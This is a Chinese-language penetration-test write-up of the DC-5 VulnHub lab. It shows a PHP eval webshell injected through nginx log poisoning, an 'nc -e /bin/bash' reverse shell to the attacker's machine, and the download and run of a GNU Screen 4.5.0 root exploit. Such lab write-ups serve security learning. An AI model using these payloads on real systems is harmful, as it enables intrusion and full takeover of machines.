首页 > 其他分享 >DC-5

DC-5

时间:2024-03-12 15:23:09浏览次数:16  
标签:bin rpcbind DC 192.168 dc sh usr

DC-5渗透测试

主机扫描

nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.109
Host is up (0.00038s latency).
MAC Address: 08:00:27:C0:33:AA (Oracle VirtualBox virtual NIC)

靶机ip:192.168.56.109

端口扫描

扫描全端口

nmap --min-rate 10000 -p- 192.168.56.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-12 02:26 EDT
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 76.19% done; ETC: 02:27 (0:00:12 remaining)
Nmap scan report for 192.168.56.109
Host is up (0.00028s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE
80/tcp    open  http
111/tcp   open  rpcbind
59961/tcp open  unknown
MAC Address: 08:00:27:C0:33:AA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 85.26 seconds

rpcbind是NFS中 用来进行消息通知的服务。一般情况 下rpcbind运行在111端口。并且NFS配置开 启rpcbind_ enable="YES"

rpcbind

可以搜一下rpcbind有什么漏洞searchsploit rpcbind,没有什么可利用的漏洞

nmap -p 111 --script=rpcinfo 192.168.56.109
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-12 02:33 EDT
Nmap scan report for 192.168.56.109
Host is up (0.00047s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          33709/udp6  status
|   100024  1          36913/tcp6  status
|   100024  1          39562/udp   status
|_  100024  1          59961/tcp   status
MAC Address: 08:00:27:C0:33:AA (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds

目录扫描

dirsearch -u http://192.168.56.109
Target: http://192.168.56.109/

[02:28:05] Starting: 
[02:28:23] 200 -    4KB - /contact.php
[02:28:24] 301 -  184B  - /css  ->  http://192.168.56.109/css/
[02:28:27] 200 -    6KB - /faq.php
[02:28:28] 200 -   17B  - /footer.php
[02:28:30] 403 -  570B  - /images/
[02:28:30] 301 -  184B  - /images  ->  http://192.168.56.109/images/
[02:28:47] 200 -  852B  - /thankyou.php

接着看web页面

漏洞发现和利用

观察页脚,每次刷新他都会变

image-20240312143700257

根据我们扫到的footer.php,这里可能包含了footer.php

wfuzz枚举一下参数

wfuzz -z file,/usr/share/wfuzz/wordlist/general/common.txt 192.168.56.109/thankyou.php?FUZZ=/etc/passwd
000000343:   200        42 L     66 W       851 Ch      "filter"
000000342:   200        42 L     66 W       851 Ch      "files"
000000341:   200        70 L     104 W      2319 Ch     "file"
000000337:   200        42 L     66 W       851 Ch      "failed"

参数就是file

这里使用的是nginx服务,可以利用日志包含

日志包含

nginx的默认日志在/var/log/nginx/access.log中,错误日志在/var/log/nginx/error.log

http://192.168.56.109/thankyou.php?file=<?php @eval($_POST[1]);?>

写进去一句话木马,直接蚁剑连接了

image-20240312145830178

接着弹一个shell到kali

nc -e /bin/bash 192.168.56.101 1234

提权

首先查看一下有suid权限的文件

www-data@dc-5:~$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/bin/su
/bin/mount
/bin/umount
/bin/screen-4.5.0
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/at
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/sbin/mount.nfs

这里我第一眼就看到了/bin/screen-4.5.0,就直接找它的漏洞

searchsploit screen
GNU Screen 4.5.0 - Local Privilege Escalation    linux/local/41154.sh

还真让我找对了,本地提权走起

复制到当前目录下

cp /usr/share/exploitdb/exploits/linux/local/41154.sh dc-5.sh

下载到靶机上

www-data@dc-5:/tmp$ wget http://192.168.56.101/dc-5.sh
wget http://192.168.56.101/dc-5.sh
converted 'http://192.168.56.101/dc-5.sh' (ANSI_X3.4-1968) -> 'http://192.168.56.101/dc-5.sh' (UTF-8)
--2024-03-12 17:09:29--  http://192.168.56.101/dc-5.sh
Connecting to 192.168.56.101:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1149 (1.1K) [text/x-sh]
Saving to: 'dc-5.sh'

dc-5.sh             100%[=====================>]   1.12K  --.-KB/s   in 0s     

2024-03-12 17:09:29 (317 MB/s) - 'dc-5.sh' saved [1149/1149]

直接执行

bash dc-5.sh
www-data@dc-5:/tmp$ bash dc-5.sh
bash dc-5.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

拿到root的权限

image-20240312151248203

总结

wfuzz的利用

nginx的日志默认路径在哪?
访问日志:/usr/local/nginx/logs/access.log 或者 /var/log/nginx/access.log
错误日志:/usr/loacl/nginx/logs/error.log 或者/var/log/nginx/error.log

靶机涉及的知识点:

文件包含,日志包含,wfuzz参数的枚举,screen提权

标签:bin,rpcbind,DC,192.168,dc,sh,usr
From: https://www.cnblogs.com/C0rr3ct/p/18068384

相关文章

  • BOSHIDA DC电源模块与稳压技术的结合优势
    BOSHIDADC电源模块与稳压技术的结合优势结合DC电源模块和稳压技术有以下优势: 1.稳定性:DC电源模块可以将交流电转换为直流电,并通过稳压技术保持输出电压稳定。这可以确保电子设备在不同负载和环境条件下都能获得稳定的电源供应,避免因电压波动而引起的设备故障或性能下降。2......
  • vulnhub靶机:dc-6
    一:信息收集1:主机发现靶机IP10.9.23.1302:端口扫描nmap-A-p--T410.9.23.1303:端口探测访问失败,返回wordy的域名,在添加hosts文件:访问成功后发现和dc2长的很像用的是wordpress,用wpscan试一下wpscan--urlhttp://wordy/-eu扫出来五个用户名adminmarkgraham......
  • BOSHIDA DC电源模块的质量控制与品牌评估
    BOSHIDADC电源模块的质量控制与品牌评估质量控制是确保DC电源模块符合一定标准的过程。品牌评估是对品牌形象、市场认可度和用户满意度的评估。下面是关于DC电源模块质量控制和品牌评估的一些建议: 质量控制:1.选择合适的供应商:与有良好声誉和专业知识的供应商合作,确保供应商......
  • vulnhub靶机:dc-5
    一:信息收集1:主机发现arp-scan-Ieth010.9.23.0/24kali的ip10.9.23.112靶机IP10.9.23.2042:端口扫描nmap-A-p--T410.9.23.2043:端口探测发现contact里面他有输入框发现底下这个页脚会发生变化,猜测存在文件包含漏洞,先扫一下目录4:目录遍历dirsearch-u10.9.23......
  • leedcode 反转链表
    自己写的,遍历一遍链表,再反向生成一个新链表classSolution:defreverseList(self,head:Optional[ListNode])->Optional[ListNode]:#检查链表是否为空ifnothead:returnNone#初始化一个空列表,用于存储原始链表节点的值......
  • flnkcdc+datastream实现mysql到mysql数据同步
    一、maven依赖<dependency><groupId>org.apache.flink</groupId><artifactId>flink-clients</artifactId><version>1.18.1</version></dependency><dependency>......
  • leedcode-同构字符串
    自己写的:classSolution:defisIsomorphic(self,s:str,t:str)->bool:#使用match函数分别检查s到t和t到s的映射关系res_a=self.match(s,t)res_b=self.match(t,s)#如果两个方向的映射关系都成立,则说明......
  • AWR1243+DCA1000——硬件触发(Hardware Trigger)
    1引言对于二维滑轨的雷达扫描系统来说,当滑轨系统运动运动速度较慢时,可以忽略其启动和停止时的加速度,而假定导轨在整个导程中是匀速运行的,这时设定雷达信号的帧发射周期即可实现在整个二维扫描平面的均匀采样,此时雷达板发射雷达信号是软件触发的。但值得注意的是,这仍然是一个开......
  • MYSQL学习笔记12: DCL数据控制语言(用户操作)
    DCL数据控制语言查询用户#用户信息保存在数据库mysql的user表中usemysql;select*fromuser;创建用户createuser'用户名'@'主机名'identifiedby'密码';在主机localhost创建一个新用户createuser'hikari39'@'localhost'identifiedby'123456......
  • MYSQL学习笔记13: DCL权限控制(用户权限操作)
    DCL权限控制查询权限showgrantsfor'用户名'@'主机名';查询某个用户的权限showgrantsfor'hikaru39'@'localhost';授予权限grant权限列表on数据库名.表名to'用户名'@'主机名';授予某个用户权限#all,给予数据库itcast中所有表的权限grantallonitcast......